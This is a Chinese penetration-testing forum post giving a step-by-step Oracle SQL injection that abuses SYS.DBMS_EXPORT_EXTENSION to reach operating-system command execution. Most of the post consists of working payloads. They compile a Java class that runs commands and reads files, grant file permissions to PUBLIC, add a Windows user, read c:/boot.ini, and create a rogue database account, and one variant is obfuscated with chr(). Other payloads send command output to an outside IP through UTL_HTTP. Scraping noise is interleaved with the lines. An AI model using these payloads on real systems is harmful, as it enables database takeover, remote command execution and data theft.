找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2596|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 - P$ _/ Q; N& A5 }+ G+ j

4 d* y/ ]" y8 Y3 T  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) $ a: l+ F8 [2 M' A- L9 b6 G/ J
的形式即可。(用" 'a'|| "是为了让语句返回true值)   ~) i3 t3 O; R1 V7 a/ y
语句有点长,可能要用post提交。 1 @' V3 s% h7 o4 L0 o4 G& O
以下是各个步骤:
  {7 t" l0 o- `  z' D1.创建包 / J$ z: f5 R6 \8 F# `
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
# @0 _9 {$ }( B: J8 r/xxx.jsp?id=1 and '1'<>'a'||( " J+ x6 c: q0 E" c7 D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# J: s: P1 N; K7 _9 n+ i$ dcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
$ Q) y/ z/ v/ R" o  c4 x5 Jnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}; y, H6 ]$ e- q2 a! [
}'''';END;'';END;--','SYS',0,'1',0) from dual 9 u0 s+ d) u, q, V- B) e
)
7 w( r9 W: g8 ]3 C8 b' C------------------------ ( _/ H$ P+ w! F. {( k1 q
如果url有长度限制,可以把readFile()函数块去掉,即: 1 l) u/ @% b* H% C7 c
/xxx.jsp?id=1 and '1'<>'a'||( . l3 a# E# F5 z2 H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% f2 p5 Q& ^; n! G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) M  L  o1 W, X$ nnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}( _0 h+ C8 N6 t, h* k
}'''';END;'';END;--','SYS',0,'1',0) from dual
: N# A, @# r8 S7 V/ c& E/ ^) # ^* U" B2 A% E2 W9 N9 @8 v1 F
同时把后面步骤 提到的 对readFile()的处理语句去掉。
5 [( c- g8 `+ K+ p* h------------------------------ 2 M1 a5 Z  R" g) A1 J; k) t6 g( C
2.赋Java权限 4 U( W0 X$ h9 w6 c5 A: w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
0 j, o5 f8 k# }7 I3 f1 J3.创建函数 + @* Q5 [1 z! R; e
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: _# Z* J4 G6 }  Mcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
- [2 r  U, X7 Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! T6 h: k; p. Acreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
* R' {8 m$ {# l9 A0 G4.赋public执行函数的权限
" S+ J5 g- k/ o* {! y6 Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual3 l9 _0 z! V% h0 v: ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual5 U6 y# S$ f/ [" C! J/ W& \
5.测试上面的几步是否成功
6 o* N( y  s0 g# j" H9 `/ Z# sand '1'<>'11'||( 1 ^5 ]) s- b3 @
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
2 j2 X. F) I5 V% o) ) d* Q/ E  k$ _2 U4 X4 ~% y5 x0 v
and '1'<>( 5 v0 P9 x+ L+ @: G
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' ( Y% g. Z) s7 n9 Q6 E
) 9 n  c. L+ l% H
6.执行命令: & X/ r3 H8 n& ?6 c
/xxx.jsp?id=1 and '1'<>(
2 ^* Q! a' e% c: P3 mselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual   o8 d8 _; J6 i' t

. k$ H. P; M) c& ]8 ?: l)
) b9 d! `* b: o* S1 w* K/xxx.jsp?id=1 and '1'<>( + Y: O, x( j) w1 A$ C. b
select  sys.LinxReadFile('c:/boot.ini') from dual
3 v- S8 [" q% T# ~' p& H) M; {6 ?) u- @4 L$ q. ^8 C/ i8 h6 E
)
3 u, w9 {" j! k1 g7 [, C  
" O( ?: Q+ V4 w% G5 V注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
4 J: Q( S# ~$ ?+ i& l如果要查看运行结果可以用 union : , r: g, x! r! t  {/ e
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
; p3 I7 Q+ j) B% W. E* N! x或者UTL_HTTP.request(:
( o7 V- [! U1 X8 r/ W$ [/xxx.jsp?id=1 and '1'<>( - B7 Y4 [6 m- d4 `$ }% G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual( O) o+ m  V) _
) - Z+ f! e8 c0 p: Y! Q! z& k$ |
/xxx.jsp?id=1 and '1'<>(
, f7 W5 r9 l2 s* tSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual& T* x. W" x8 j0 h
) 1 G* z. n; M# r, n4 G8 y
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
5 _9 v+ h: J) X. S2 D-------------------- 5 `  u: Y  ~8 k0 A0 P* J) [  `+ B; h
6.内部变化
7 y* p2 I( |8 {通过以下命令可以查看all_objects表达改变:
' h( T, t8 y1 Jselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
) g+ C$ [  ^( n5 n8 B7.删除我们创建的函数
) I$ O7 c& g& B0 ^; ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 a* ^0 ~6 @* S: J6 _( J1 A
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual / N* `/ {: ]( ]6 Q2 N
====================================================
) k5 [; |' _( z. u全文结束。谨以此文赠与我的朋友。 " E$ r2 [' A' k% o
linx 9 w, X' n6 k: Q  f0 z- X6 O: {
124829445
) G0 t* T  f" C7 A7 c; O8 [2008.1.12 % q! H2 v8 v* p) E
linyujian@bjfu.edu.cn
. ?0 j' b0 g' q, c/ I$ @5 ?======================================================================
# @6 U2 k' i2 C测试漏洞的另一方法: 9 x: {& ~2 J  |; {" ]
创建oracle帐号:
4 Y9 }8 l7 l3 g" Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 z& u2 M# T) Y6 f5 w) Z) T  vCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
$ X1 q- B+ j$ x1 w即: 9 e* U3 m! x$ C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),! Z) z. j6 g+ Z( d# w
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 5 G. C1 [) }9 E8 h2 Z- ]) V/ Z
确定漏洞存在: ; k9 R  |% o2 b8 \0 l4 Z
1<>( - Z& P4 o5 m6 E# z2 o6 F, d+ C
select user_id from all_users where username='LINXSQL'
- M: T' Y4 l7 p8 G8 w: g)
* F. |; e  A4 R0 o+ B7 y给linxsql连接权限:
% E: d3 t6 W1 j& p1 Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, e+ u# h8 ?2 ^- ~, {GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 ~5 x  g. k) ~$ u
删除帐号:
: [5 p% }$ D/ I# Sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 H. O0 r# `8 ]/ Q3 q7 g7 c) ]6 Q7 O
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
# @4 m4 p+ n1 p" J====================== 7 f7 B, z0 N; k* ~
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:7 y( M9 X8 o4 _+ V- C+ d
1.jsp?id=1 and '1'<>( $ @5 S; X9 _$ E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- S. j7 d' F( r  v2 ~8 x1 I0 R7 O: _
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
  ~, x1 n. x# E) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE; Z! R/ h$ L$ X$ x2 V
 )! X0 w: F5 [5 N5 ~! }

' `4 F2 j0 h* ~9 @/ F8 e7 q
0 h3 J" r7 O# p! Y7 e2 U% r* o: b% W6 ~4 Y8 F
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表